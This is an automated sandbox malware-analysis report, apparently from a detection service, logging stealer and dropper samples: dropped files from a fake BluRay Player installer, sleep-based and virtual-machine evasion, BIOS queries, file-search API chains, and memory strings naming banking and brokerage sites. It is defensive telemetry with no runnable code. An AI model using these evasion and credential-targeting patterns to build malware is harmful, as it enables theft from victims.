Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IKC0D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-KC0R0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgobject-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libtiff-5.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk-win32-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-AD0KH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001567001\hhnjqu9y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk_pixbuf-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-S71CN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-71E5U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-1FNCS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpixman-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-NT9JC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-M38NA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libjpeg-8.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libintl-8.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\univ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\librsvg-2-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-N39PE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblzma-5.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\SfOAQrSBjSOejUhiNHNf.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-K2BT4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangocairo-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LD4GG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgraphite2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgmodule-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-RUKE1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblcms2-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LIOS8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgcc_s_dw2-1.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

API coverage: 6.2 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5292	Thread sleep count: 1060 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5292	Thread sleep time: -2121060s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5492	Thread sleep count: 1131 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5492	Thread sleep time: -2263131s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 528	Thread sleep count: 115 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 528	Thread sleep time: -3450000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1576	Thread sleep count: 1109 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1576	Thread sleep time: -2219109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6352	Thread sleep count: 1087 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6352	Thread sleep time: -2175087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1272	Thread sleep count: 1130 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1272	Thread sleep time: -2261130s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2300	Thread sleep count: 1138 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2300	Thread sleep time: -2277138s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe TID: 5564	Thread sleep count: 1177 > 30
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe TID: 5564	Thread sleep time: -35310000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe TID: 5712	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe TID: 5564	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 5632	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe TID: 6524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4400	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5232	Thread sleep time: -4830000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6368	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 736	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5232	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe TID: 2812	Thread sleep count: 65 > 30
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe TID: 2812	Thread sleep time: -130000s >= -30000s
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe TID: 2436	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe TID: 2436	Thread sleep time: -1860000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6064	Thread sleep count: 347 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6064	Thread sleep time: -694347s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6432	Thread sleep count: 345 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6432	Thread sleep time: -690345s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 3236	Thread sleep time: -56000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 1244	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 5616	Thread sleep count: 347 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 5616	Thread sleep time: -694347s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 4336	Thread sleep count: 300 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 4336	Thread sleep time: -600300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6628	Thread sleep count: 347 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 6628	Thread sleep time: -694347s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 3860	Thread sleep count: 356 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 3860	Thread sleep time: -712356s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 2424	Thread sleep count: 338 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 2424	Thread sleep time: -676338s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 4244	Thread sleep count: 354 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe TID: 4244	Thread sleep time: -708354s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe TID: 5828	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe TID: 5428	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	7_2_0069E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_006A4910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	7_2_0069BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_006916D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	7_2_006A3EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_0069F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	7_2_0069DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A38B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	7_2_006A38B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A4570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	7_2_006A4570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	7_2_0069ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_0069DE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_00691160 GetSystemInfo,ExitProcess,

7_2_00691160

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx,g
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.000000000550A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.2097462080.0000000001370000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: axplong.exe, 00000006.00000002.4838480992.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2976296155.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3415654770.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975549924.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3415654770.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.4840740719.000001D5BCC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.4900461514.000001D5C2254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: new_v8.exe, 0000001E.00000003.2976296155.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3415654770.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975549924.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf
Source: Gxtuum.exe, 00000009.00000002.4813288621.000000000087E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JavUmar.exe, 0000001F.00000003.3603217662.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.000000000550A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: axplong.exe, axplong.exe, 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp, 3288f0a855.exe, 00000028.00000000.3244460789.00000000007C8000.00000080.00000001.01000000.0000001E.sdmp, 3288f0a855.exe, 00000028.00000002.4383464411.00000000007C8000.00000040.00000001.01000000.0000001E.sdmp, 3288f0a855.exe, 00000028.00000003.3305788570.0000000004D92000.00000004.00000800.00020000.00000000.sdmp, YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000002.3618621418.000000000042C000.00000040.00000001.01000000.00000022.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: JavUmar.exe, 0000001F.00000003.3603217662.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: GOLD1234.exe, 0000002C.00000002.3684944310.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdN$
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
